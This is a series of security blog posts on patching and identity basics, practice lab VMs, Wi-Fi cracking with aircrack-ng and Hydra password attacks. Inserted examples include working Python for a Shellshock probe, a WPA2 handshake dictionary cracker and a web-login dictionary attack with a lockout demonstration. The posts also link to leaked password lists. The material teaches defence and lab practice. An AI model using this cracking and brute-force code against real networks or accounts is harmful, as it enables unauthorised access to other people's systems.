We Must Master The Cybersecurity Basics

A great SECINT (Security Intelligence) paper that John Stewart wrote:

http://www.cisco.com/web/about/security/intelligence/JNS_TTPs.pdf


The basics that must be mastered:

  • Patching
  • Identity: strong identity, federated identity, and identity-based networking
  • Eliminating dark space

Notice that basic #1 is patching. We must be able to patch on a timely basis with a regular methodology; otherwise our systems are an easy target. We discuss this many times: a hacker performs VA, Vulnerability Analysis (the VA step of the SVAPE&C explanation), and an unpatched system is exactly what that step turns up.

Identity means authentication, which Mr. Stewart has broken down into strong identity, identity-based networking and federated identity.

This topic is a bit more complicated, since two-factor authentication is not so easy to set up, but if you want to make it much harder for attackers to get into your systems this is a good place to invest in security, especially as we try to reach from our smartphones and mobile devices all the files we can reach from a desktop.

Eliminating dark space is an interesting one.

I think defining dark space gives an idea of what one can do to make more of the network "white".

Dark space is the inverse of what is visible on the network: the systems and devices that exist but that your scans and inventories do not show.

That covers a device that does not reply when you scan but is on the network at the times you do not scan (powered off, asleep, or only connected occasionally), and a segment you cannot scan at all because a firewall or ACL blocks the scanner. Special circumstances like these create dark space, and Security needs to uncover as much of it as possible within a reasonable timespan, because an unpatched device you cannot see is still reachable by an attacker who can.

 

 

 

 

 

 

Testing System Vulnerabilities

It would be a good idea to test your system hacking skills on systems that are not production systems.

But who has time to build systems with a few vulnerabilities?

Well, vulnhub.com has done it for you.

[Image: bWAPP VMware system]

Here is bWAPP, which you can download as a VMware image of a deliberately vulnerable web application that can be attacked for practice.

 

Another one is the following:

shellshock-lab

This system has a Shellshock vulnerability and is very easy to hack (I can copy the /etc/passwd and /etc/shadow files right off the system without a user ID).

 

Better to test your hacking skills on these types of platforms rather than live systems which could affect people running their day-to-day operations.
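Before using a lab like shellshock-lab it helps to know what the bug is: bash (CVE-2014-6271) executed whatever followed a function definition passed in through an environment variable. The check below is an added example for this page, not code from vulnhub, the lab VM or the blog; it runs the well-known local probe against whichever bash is on the PATH (or one you name), so you can confirm the lab host is vulnerable and your own attack machine is patched.

```python
"""Local Shellshock (CVE-2014-6271) check for a bash binary.

Added example: runs the well-known probe, an exported function definition
with a command appended, and reports whether bash executed the command.
"""
import os
import shutil
import subprocess

# A function definition in an environment variable; on unpatched bash the
# text after the closing brace runs when the shell starts.
PROBE = "() { :; }; echo SHELLSHOCK-PROBE-FIRED"


def check_shellshock(bash=None):
    """Return "vulnerable", "patched" or "unknown" (bash missing/unusable)."""
    bash = bash or shutil.which("bash")
    if bash is None:
        return "unknown"
    env = dict(os.environ, PROBE=PROBE)   # the variable name is arbitrary
    try:
        done = subprocess.run([bash, "-c", "echo probe-done"], env=env,
                              capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return "unknown"
    if done.returncode != 0 or "probe-done" not in done.stdout:
        return "unknown"                    # bash did not even run our command
    return "vulnerable" if "SHELLSHOCK-PROBE-FIRED" in done.stdout else "patched"


if __name__ == "__main__":
    print("bash is", check_shellshock())
```

This only tells you whether the interpreter itself is affected; on a target the probe string has to reach bash through something that copies attacker-controlled input into environment variables, which is what the CGI handlers in labs like this one do.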

 

Contact Us if you need help in setting up a test lab.

 

Talking Cybersecurity like strategy discussion for Rock-Paper-Scissors

[Image: rock-paper-scissors diagram, from Wikipedia]

 

The problem is that cybersecurity seems easy to those of us in the security field (just like the game above), yet the strategy is hard to explain to an executive immersed in their regular world. Cyber strategy is also not so cut and dried.

The hackers are attacking old vulnerabilities because people are not patching their computers.

Yet even if a user patches the computer and then clicks on a phishing email, the computer is still hacked.

And what happens when a password is guessed, or stolen from a breached website where the user entered a password they reuse elsewhere? Now the hacker can access the network with your credentials.

If the hacker can log on to your network with your credentials, that is like winning every time at rock-paper-scissors, since you can see the other player's hand before you show yours.

Then on top of all that there are zero-day attacks, and forever-day attacks, where the platform will never get a fix, so the hacker can keep exploiting it until the problem is solved some other way (assuming it can be).

No wonder a lot of people are tuning us security folks out for the most part:

 

[Image: slide from the RSA Conference talk linked below]

 

From Cisco VP and Chief Architect Martin Roesch: http://www.rsaconference.com/media/advanced-strategies-for-defending-against-a-new-breed-of-attacks

 

From the image:

Even the basics are not covered. Less than half of security practitioners leverage critical security tools:

  • Security administration and provisioning: 43%
  • Patching and configuration: 38%
  • Pentesting: 29%
  • Quarantine malicious apps: 55%

 

 

SecOps is not just buying new devices from Cisco; it is doing the basics: patching, good password training, security awareness. The difficulty with security training is one of attention and focus.

Everyone wants to do their regular projects, not security projects. People do not want to remember difficult passwords or change passwords every 60 days.

Those of us in security have to be cognizant of the "regular" world.

We have to do the basics, because although we will never be 100% secure (that cannot be done), we can make things better and much harder for the hacker, which is what a good cybersecurity program should do.

The key, of course, is to have personnel with the ability to make decisions even while everything else is going on: focus and commitment. Communicating this is just as important.

 


How-To Hack Wifi: Testing Defenses

Hacking Wi-Fi is useful because we want to test our defenses, to make sure a certain level of defense is actually in place.

Aircrack-ng is used to crack Wi-Fi encryption and is available on the Kali Linux operating system (the distribution built for pentesters/ethical hackers).

[Image: aircrack-ng output]

As in this tutorial by WonderHowTo, there are a few steps to perform before capturing data from the targeted Wi-Fi access point.

First one has to put a Wi-Fi card into monitor mode (airmon-ng does this) so that airodump-ng can capture frames; aircrack-ng then attempts to crack the WEP or WPA key of the access point under test.

"Aircrack-ng is the primary application within the aircrack-ng suite, which is used for password cracking. It is capable of using statistical techniques to crack WEP and dictionary cracks for WPA and WPA2 after capturing the WPA handshake."

One then accumulates enough data (many IV-carrying packets for WEP, or the four-way handshake for WPA/WPA2) before trying to crack the key.

There are several other tools in the aircrack-ng suite:

  • aireplay-ng: generates or accelerates traffic on the access point (packet injection, ARP request replay, and deauthentication to force a client to reconnect so the WPA handshake can be captured).
  • airdecap-ng: decrypts captured wireless traffic once the key is known.
  • airtun-ng: virtual tunnel interface creator.
  • airolib-ng: stores and manages ESSID and password lists and precomputes PMKs to speed up WPA/WPA2 cracking.
  • airbase-ng: turns the laptop/computer into an access point.

The reason one wants to spend time testing defenses is that Wi-Fi tends to be set up and then forgotten, and if it was set up incorrectly (WEP, or WPA/WPA2 with a passphrase that appears in a wordlist) it should be fixed.
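What aircrack-ng does with that handshake, shown as an added example that is not aircrack-ng's code and not from the tutorial: derive the PMK from each candidate passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations), expand it to the PTK with the two MAC addresses and nonces, and compare an HMAC over the captured EAPOL frame with the MIC in the capture. Because it has to run offline, the handshake below (MACs, nonces, EAPOL message 2 and its MIC) is synthesised in the script from a passphrase the cracking function never sees; the SSID "IEEE" / passphrase "password" pair used in the check is the published IEEE 802.11i test vector.

```python
"""WPA2-PSK dictionary attack against a captured four-way handshake.

Added example: the arithmetic aircrack-ng performs once airodump-ng has
captured the handshake. The capture is synthesised below so it runs offline.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(key, label||0x00||data||i)."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2 key descriptor version 2: MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


# --- constructed "capture" (what airodump-ng would have written) ----------
SSID = "homenet"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
# EAPOL-Key message 2 (key info 0x010a: version 2, pairwise, MIC set) with
# the 16-byte MIC field zeroed, which is how the MIC is computed and checked.
EAPOL_M2 = (bytes.fromhex("0103005f02010a0000" "0000000000000001")
            + SNONCE + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))


def handshake_mic(passphrase):
    """MIC that message 2 would carry if the network used this passphrase."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_M2)


# The network owner's real passphrase: used only to synthesise the capture.
CAPTURED_MIC = handshake_mic("batterystaple")
CANDIDATES = ["password", "12345678", "linksys", "batterystaple", "admin123"]


def crack_wpa2(candidates, captured_mic=CAPTURED_MIC):
    """Return the first candidate whose derived MIC matches the capture."""
    for passphrase in candidates:
        if hmac.compare_digest(handshake_mic(passphrase), captured_mic):
            return passphrase
    return None


if __name__ == "__main__":
    print("KEY FOUND:", crack_wpa2(CANDIDATES))
```

The 4096 PBKDF2 iterations per candidate are why WPA/WPA2 dictionary attacks are slow and why airolib-ng precomputes PMKs per ESSID; they are also why a passphrase that is in no wordlist (long, random, or several unrelated words) makes the captured handshake worthless to the attacker.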

We at Fixvirus.com have a Wi-Fi service: Psi service

[Image: an old Linksys Wi-Fi router]

Hydra Tool Can Crack Your Online Passwords

Here is a website link that discusses using Hydra to crack online passwords at websites:

http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html

The tool iterates through a dictionary of passwords against SSH and FTP server accounts very easily, without any extra configuration.

The same goes for website forms that take usernames and passwords (like WordPress, Joomla or other CMS logins).

 

There is a better blog explaining what Hydra does, with a successful sample attack:

http://cs337-unyunizer.blogspot.com/

[Image: Hydra output snippet from the attack]

The snippet is from the cs337-unyunizer.blogspot.com webpage.

All the white lines are the failed attempts, while the green line is the successful attempt with the correct password.

 

So this tool makes trying passwords easy to set up; the hard part, of course, is finding a good dictionary of words to try against the username (this is a dictionary attack, often loosely called a brute-force password attack).

 

Interesting to note: if CAPTCHA (or account lockout and rate limiting) is implemented well, this method will not work at all, because the tool cannot get past the challenge on every attempt.

So let us say one is a criminal hacker. The key is to find a good password file (built from passwords already known on the internet); there are files out there which let the criminal amass a decent password list with which to attack sites. Or one can generate a file on their own.

 

A good Google search can start the hacker on the way to building this file.

http://security.stackexchange.com/questions/1376/where-can-i-find-good-dictionaries-for-dictionary-attacks is one example.

There is a list of password dictionaries at https://wiki.skullsecurity.org/Passwords. Some of the lists are the ones the Conficker worm used to spread.

Some leaked password sets (like the ones from Sony, etc.) have been compiled there as well.

So you can see it is a relatively straightforward method to go after online websites that have usernames and passwords.
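The attack loop Hydra runs against a login form, together with the defence the CAPTCHA remark above is getting at, as an added example that is neither Hydra's code nor from either blog: a small WordPress-style login form runs in-process on localhost, and the attacker function POSTs each candidate and reads the reply the way Hydra's http-post-form module does, treating a response without the failure string as a hit. The same run is then repeated against a form that locks the account after three failures. The credential, the form field names, the URL path and the wordlist are all constructed.

```python
"""Hydra-style dictionary attack on a web login form, with and without lockout.

Added example: an in-process login form (so it runs offline) and an attacker
loop that mimics Hydra's http-post-form failure-string logic.
"""
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

VALID_USERS = {"admin": "letmein2014"}   # constructed target credential
WORDLIST = ["123456", "password", "admin", "welcome", "letmein2014", "qwerty"]


class LoginHandler(BaseHTTPRequestHandler):
    """Minimal CMS-like login: POST log/pwd, 'Login failed' text on a miss."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("log", [""])[0]
        pw = form.get("pwd", [""])[0]
        srv = self.server
        if srv.lockout_after is not None and srv.failures.get(user, 0) >= srv.lockout_after:
            body, status = "Account locked, try again later", 403
        elif VALID_USERS.get(user) == pw:
            body, status = "Welcome back, " + user, 200
        else:
            srv.failures[user] = srv.failures.get(user, 0) + 1
            body, status = "Login failed: invalid username or password", 200
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):   # keep the example quiet
        pass


def start_login_form(lockout_after=None):
    """Serve the form on a free localhost port; return (server, login url)."""
    server = HTTPServer(("127.0.0.1", 0), LoginHandler)
    server.lockout_after = lockout_after   # None = no defence at all
    server.failures = {}
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d/wp-login.php" % server.server_address[1]


def try_login(url, user, pw):
    """One POST of the form; returns (status, body) without raising on 4xx."""
    data = urllib.parse.urlencode({"log": user, "pwd": pw}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()


def dictionary_attack(url, user, wordlist, failure_string="Login failed"):
    """Hydra http-post-form logic: a reply without the failure string is a hit.

    Returns (password or None, number of attempts made).
    """
    for n, candidate in enumerate(wordlist, 1):
        status, body = try_login(url, user, candidate)
        if status == 403 or "locked" in body:
            return None, n            # the defence kicked in; attack is stuck
        if failure_string not in body:
            return candidate, n
    return None, len(wordlist)


def run_demo():
    """Same wordlist against an undefended form and a form with lockout."""
    results = {}
    for label, lockout in (("no lockout", None), ("lockout after 3", 3)):
        server, url = start_login_form(lockout)
        try:
            results[label] = dictionary_attack(url, "admin", WORDLIST)
        finally:
            server.shutdown()
            server.server_close()
    return results


if __name__ == "__main__":
    for label, (pw, n) in run_demo().items():
        print("%-16s -> %s after %d attempts" % (label, pw, n))
```

Against the undefended form the correct password is found on the fifth attempt; with lockout the fourth request is refused and the tool has nothing left to do, which is the effect a well-implemented CAPTCHA has as well. Note that a lockout keyed only on the username also hands the attacker a way to lock your users out, so rate limiting per source and per account is the usual compromise.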

Why am I saying this? Because we have to become better at making passwords: change your passwords, make them longer, and use less common word combinations with numbers and special characters. And the longer the better, to the tune of 10 to 20 characters.

Check this xkcd comic: http://xkcd.com/936/ It tries to show pictorially that it is better to run several words together than to use difficult combinations that cannot be remembered.